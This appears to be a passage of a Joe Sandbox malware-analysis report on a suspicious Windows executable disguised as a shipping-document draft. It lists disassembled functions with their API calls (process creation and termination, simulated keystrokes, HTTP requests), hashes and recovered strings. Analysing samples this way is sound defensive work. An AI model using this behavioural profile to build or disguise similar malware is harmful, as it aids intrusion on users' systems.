                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                • String ID:
                                                                • API String ID: 2603140658-3916222277
                                                                • Opcode ID: 3a2840ab701ea98f766be649a2ea959cdee51183ef9d75f6137b17537f7e5307
                                                                • Instruction ID: c52650e10e160781258a5439245d1c54231fa150dde38e1959c787d6f9de2fa1
                                                                • Opcode Fuzzy Hash: 3a2840ab701ea98f766be649a2ea959cdee51183ef9d75f6137b17537f7e5307
                                                                • Instruction Fuzzy Hash: D8418EB1501218BFEB118F54CC99FFB7BACEF09364F00816AFA059A151EB749E449BE4
                                                                Function 009A8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,009BF910), ref: 009A8D28
                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,009BF910), ref: 009A8D5C
                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009A8ED6
                                                                • SysFreeString.OLEAUT32(?), ref: 009A8F00
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                • String ID:
                                                                • API String ID: 560350794-0
                                                                • Opcode ID: 935adbc181849dfbf1d5daba0264f6611a8523f68276396675328e1916aa36fc
                                                                • Instruction ID: 9432a73c7f1ffd07b93220e4849b2424eb18368b7a181052b411307010e20312
                                                                • Opcode Fuzzy Hash: 935adbc181849dfbf1d5daba0264f6611a8523f68276396675328e1916aa36fc
                                                                • Instruction Fuzzy Hash: 38F11A71A00219EFDF14EF94C888EAEB7B9FF86314F108558F905AB251DB71AE45CB90
                                                                Function 009AF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 009AF6B5
                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009AF848
                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009AF86C
                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009AF8AC
                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009AF8CE
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009AFA4A
                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009AFA7C
                                                                • CloseHandle.KERNEL32(?), ref: 009AFAAB
                                                                • CloseHandle.KERNEL32(?), ref: 009AFB22
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                • String ID:
                                                                • API String ID: 4090791747-0
                                                                • Opcode ID: f52e7c4aa5823af246d4e4e4e5ab4ee6727c263b944bc26463d62402b7953c06
                                                                • Instruction ID: 2829518048fad512719864b83c08544bd62f6876bcfbfffb65ba1c3d31724dae
                                                                • Opcode Fuzzy Hash: f52e7c4aa5823af246d4e4e4e5ab4ee6727c263b944bc26463d62402b7953c06
                                                                • Instruction Fuzzy Hash: A2E1A1316042019FCB14EF64C8A1B6ABBE5EFC6354F14896DF8999B2A1DB30DC45CF92
                                                                Function 00994CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0099466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00993697,?), ref: 0099468B
                                                                  • Part of subcall function 0099466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00993697,?), ref: 009946A4
                                                                  • Part of subcall function 00994A31: GetFileAttributesW.KERNEL32(?,0099370B), ref: 00994A32
                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00994D40
                                                                • _wcscmp.LIBCMT ref: 00994D5A
                                                                • MoveFileW.KERNEL32(?,?), ref: 00994D75
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                • String ID:
                                                                • API String ID: 793581249-0
                                                                • Opcode ID: ece6aeb3d8295c8b96de38483103ac94b99bf42928f2bceb2c61788fa765444c
                                                                • Instruction ID: c845dca08fb2a2a98939770d51af245a2dcc4d36e6626e40ac7a5958578b1eb1
                                                                • Opcode Fuzzy Hash: ece6aeb3d8295c8b96de38483103ac94b99bf42928f2bceb2c61788fa765444c
                                                                • Instruction Fuzzy Hash: 3C5142B24083459BCB25DBA4D881EDBB3ECAFC5351F40092EB589D3191EF34A589CB66
                                                                Function 009B8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009B86FF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: InvalidateRect
                                                                • String ID:
                                                                • API String ID: 634782764-0
                                                                • Opcode ID: 306b9ab97a26966cf7ade8be7d576c54887c8938ce2a0a02d0092510a3d059d4
                                                                • Instruction ID: 341617239cee42a38c067a93469827c86ce72aab7a1522d9814bac116fe54e92
                                                                • Opcode Fuzzy Hash: 306b9ab97a26966cf7ade8be7d576c54887c8938ce2a0a02d0092510a3d059d4
                                                                • Instruction Fuzzy Hash: 3651A170510248FFDB249B24CE89FEA7B6CAB09734F604615F920E61A0CF75A980DB40
                                                                Function 00932B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0096C2F7
                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0096C319
                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0096C331
                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0096C34F
                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0096C370
                                                                • DestroyIcon.USER32(00000000), ref: 0096C37F
                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0096C39C
                                                                • DestroyIcon.USER32(?), ref: 0096C3AB
                                                                  • Part of subcall function 009BA4AF: DeleteObject.GDI32(00000000), ref: 009BA4E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                • String ID:
                                                                • API String ID: 2819616528-0
                                                                • Opcode ID: 2a3f33541d0afd1f9afbd9cda84ea7436b2fc6640c10a4bc343bd7057c4c49d4
                                                                • Instruction ID: 5c7df497ea26f75a01ebf36987527221bff90dc6bb706ff9f54453b40bc582ec
                                                                • Opcode Fuzzy Hash: 2a3f33541d0afd1f9afbd9cda84ea7436b2fc6640c10a4bc343bd7057c4c49d4
                                                                • Instruction Fuzzy Hash: 99514770A10209EFDB20DF64CC55FAA7BB9EB58720F104629F952972A0DB70ED90EB50
                                                                Function 0098966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0098A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0098A84C
                                                                  • Part of subcall function 0098A82C: GetCurrentThreadId.KERNEL32 ref: 0098A853
                                                                  • Part of subcall function 0098A82C: AttachThreadInput.USER32(00000000,?,00989683,?,00000001), ref: 0098A85A
                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0098968E
                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009896AB
                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009896AE
                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 009896B7
                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009896D5
                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009896D8
                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 009896E1
                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009896F8
                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009896FB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                • String ID:
                                                                • API String ID: 2014098862-0
                                                                • Opcode ID: 19ff21c32d14ca6f38b2fc68108cc6d393eaa814d16c0bff6ec89f7b3f86f432
                                                                • Instruction ID: 98d58121697143d80ac1a3aa5b45dbac6fc6db31cddba61add918f3d7a084919
                                                                • Opcode Fuzzy Hash: 19ff21c32d14ca6f38b2fc68108cc6d393eaa814d16c0bff6ec89f7b3f86f432
                                                                • Instruction Fuzzy Hash: 3A11CEB1924218BEF6106B649C89F6A3B2DEB4C764F200525F644AB1A0C9F25C10ABA4
                                                                Function 00988921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0098853C,00000B00,?,?), ref: 0098892A
                                                                • HeapAlloc.KERNEL32(00000000,?,0098853C,00000B00,?,?), ref: 00988931
                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0098853C,00000B00,?,?), ref: 00988946
                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,0098853C,00000B00,?,?), ref: 0098894E
                                                                • DuplicateHandle.KERNEL32(00000000,?,0098853C,00000B00,?,?), ref: 00988951
                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0098853C,00000B00,?,?), ref: 00988961
                                                                • GetCurrentProcess.KERNEL32(0098853C,00000000,?,0098853C,00000B00,?,?), ref: 00988969
                                                                • DuplicateHandle.KERNEL32(00000000,?,0098853C,00000B00,?,?), ref: 0098896C
                                                                • CreateThread.KERNEL32(00000000,00000000,00988992,00000000,00000000,00000000), ref: 00988986
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                • String ID:
                                                                • API String ID: 1957940570-0
                                                                • Opcode ID: 6b32adef944d711ebea7cd1e2f9967453aa55590675e80cf6390103fcce6e348
                                                                • Instruction ID: f9342e03cf4f0b7dde29a41e50b2b7c152952a660697d7903150dbd2b78f4c64
                                                                • Opcode Fuzzy Hash: 6b32adef944d711ebea7cd1e2f9967453aa55590675e80cf6390103fcce6e348
                                                                • Instruction Fuzzy Hash: 6D01BFB5254304FFE710AFA9DD4DF677B6CEB89711F404521FA05DB291CA719800DB20
                                                                Function 009A9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                • API String ID: 0-572801152
                                                                • Opcode ID: 73b8feda14385bc80e5ad6610ff797b0be31533f75f176243b22e542c176f389
                                                                • Instruction ID: 18ff44257db8c2dd47925461d4fc1b1022e797139885cce8e9bdf1dd4d9681c8
                                                                • Opcode Fuzzy Hash: 73b8feda14385bc80e5ad6610ff797b0be31533f75f176243b22e542c176f389
                                                                • Instruction Fuzzy Hash: E3C19471A002199FDF10DF98D884BAEB7F9FB89314F248469E909AB281E7709D45CBD0
                                                                Function 009A9113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInit$_memset
                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                • API String ID: 2862541840-625585964
                                                                • Opcode ID: 9718695b230658cade0fee7183242b0d0adb9d7697c7e3941d3d2912cd9b3c55
                                                                • Instruction ID: 4fdb56518499ed14c9115bead939ee1c0f252919889396a945c660a993a0f439
                                                                • Opcode Fuzzy Hash: 9718695b230658cade0fee7183242b0d0adb9d7697c7e3941d3d2912cd9b3c55
                                                                • Instruction Fuzzy Hash: 02918E71A00219ABDF24DFA5C848FAFB7B8FF86714F108559F915AB280DB709945CFA0
                                                                Function 009A975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0098710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?,?,00987455), ref: 00987127
                                                                  • Part of subcall function 0098710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?), ref: 00987142
                                                                  • Part of subcall function 0098710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?), ref: 00987150
                                                                  • Part of subcall function 0098710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?), ref: 00987160
                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 009A9806
                                                                • _memset.LIBCMT ref: 009A9813
                                                                • _memset.LIBCMT ref: 009A9956
                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 009A9982
                                                                • CoTaskMemFree.OLE32(?), ref: 009A998D
                                                                Strings
                                                                • NULL Pointer assignment, xrefs: 009A99DB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                • String ID: NULL Pointer assignment
                                                                • API String ID: 1300414916-2785691316
                                                                • Opcode ID: 97be97ea54fb02a3e4aa2c834c663b4ef274489b8f2c3c2f85883d77f85b6e64
                                                                • Instruction ID: 656067a3c5d98f3256084e66d2e958942a7320465ee53bbde5fa4c2f92bd0c41
                                                                • Opcode Fuzzy Hash: 97be97ea54fb02a3e4aa2c834c663b4ef274489b8f2c3c2f85883d77f85b6e64
                                                                • Instruction Fuzzy Hash: 62911571D00229EBDB10DFA5DC85EDEBBB9BF49310F20415AF419A7291DB719A44CFA0
                                                                Function 009B6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009B6E24
                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 009B6E38
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009B6E52
                                                                • _wcscat.LIBCMT ref: 009B6EAD
                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 009B6EC4
                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009B6EF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window_wcscat
                                                                • String ID: SysListView32
                                                                • API String ID: 307300125-78025650
                                                                • Opcode ID: e18e41b5e85554cb49988055afddb26e9e05438ff92961967206d1dfd637ab75
                                                                • Instruction ID: bf4c81967c5bdcf986be9a3c2a9243b52cd2c747a8bfb90ca87456de3ecce70c
                                                                • Opcode Fuzzy Hash: e18e41b5e85554cb49988055afddb26e9e05438ff92961967206d1dfd637ab75
                                                                • Instruction Fuzzy Hash: 83419171A00348EBEB21DF64CD85BEE77A8EF48364F10052AF984E71D1D675AD848B60
                                                                Function 009AE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00993C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00993C7A
                                                                  • Part of subcall function 00993C55: Process32FirstW.KERNEL32(00000000,?), ref: 00993C88
                                                                  • Part of subcall function 00993C55: CloseHandle.KERNEL32(00000000), ref: 00993D52
                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009AE9A4
                                                                • GetLastError.KERNEL32 ref: 009AE9B7
                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009AE9E6
                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 009AEA63
                                                                • GetLastError.KERNEL32(00000000), ref: 009AEA6E
                                                                • CloseHandle.KERNEL32(00000000), ref: 009AEAA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                • String ID: SeDebugPrivilege
                                                                • API String ID: 2533919879-2896544425
                                                                • Opcode ID: 28d10f70f0b15e9b97b7c5f34e1c55f8c103ae621439b2c761868248664e6816
                                                                • Instruction ID: 5a0e878fa98b54476b963b4b2a21ba097a239da26b2a10220f6d88232ade420c
                                                                • Opcode Fuzzy Hash: 28d10f70f0b15e9b97b7c5f34e1c55f8c103ae621439b2c761868248664e6816
                                                                • Instruction Fuzzy Hash: 164176712042019FDB14EF28CCA5F6EBBA5AF85314F188458F9469B3D2DBB5AD04CF91
                                                                Function 00992F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00993033
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: IconLoad
                                                                • String ID: blank$info$question$stop$warning
                                                                • API String ID: 2457776203-404129466
                                                                • Opcode ID: 59a1c2f2801fd4574d65a110c79c89d0ac5bd49ef1ae99ec6c2029bbd72b59d0
                                                                • Instruction ID: 2871e306cde4f62e927c8533c3ec3c60c2e9367cff9c8af6f5c22be8ade9db66
                                                                • Opcode Fuzzy Hash: 59a1c2f2801fd4574d65a110c79c89d0ac5bd49ef1ae99ec6c2029bbd72b59d0
                                                                • Instruction Fuzzy Hash: D6116A31348386BEEF159F5EDC83D6B779CDF1A360B20406AF904A6182DF745F4856A0
                                                                Function 009942F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00994312
                                                                • LoadStringW.USER32(00000000), ref: 00994319
                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0099432F
                                                                • LoadStringW.USER32(00000000), ref: 00994336
                                                                • _wprintf.LIBCMT ref: 0099435C
                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0099437A
                                                                Strings
